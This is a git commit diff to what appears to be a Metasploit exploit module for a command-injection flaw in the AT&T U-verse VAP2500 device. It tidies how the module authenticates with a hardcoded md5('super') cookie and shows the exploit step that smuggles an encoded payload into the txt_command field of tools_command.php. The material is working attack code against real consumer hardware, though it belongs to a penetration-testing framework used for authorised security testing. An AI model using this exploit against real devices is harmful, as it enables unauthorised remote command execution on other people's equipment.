Use cookie option

jvazquez-r7 · jvazquez-r7 · commit 169052af5c5b · 2015-01-21T20:37:38.000-06:00
diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb
@@ -35,7 +35,7 @@ def initialize(info = {})
           ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']
         ],
       'DisclosureDate' => 'Nov 25 2014',
-      'Privileged'     => false,
+      'Privileged'     => true,
       'Payload'        =>
         {
           'DisableNops' => true,
@@ -53,9 +53,7 @@ def check
       res = send_request_raw({
         'method' => 'GET',
         'uri' => '/tools_command.php',
-        'headers' => {
-          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
-          }
+        'cookie' => "p=#{Rex::Text.md5('super')}"
       })
       if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
         return Exploit::CheckCode::Vulnerable
@@ -88,10 +86,9 @@ def exploit
           'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
         },
         'method' => 'POST',
-        'headers' => {
-          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
-          }
+        'cookie' => "p=#{Rex::Text.md5('super')}"
       })
+
       if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
         print_good("#{peer} - Command sent successfully")
         if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m
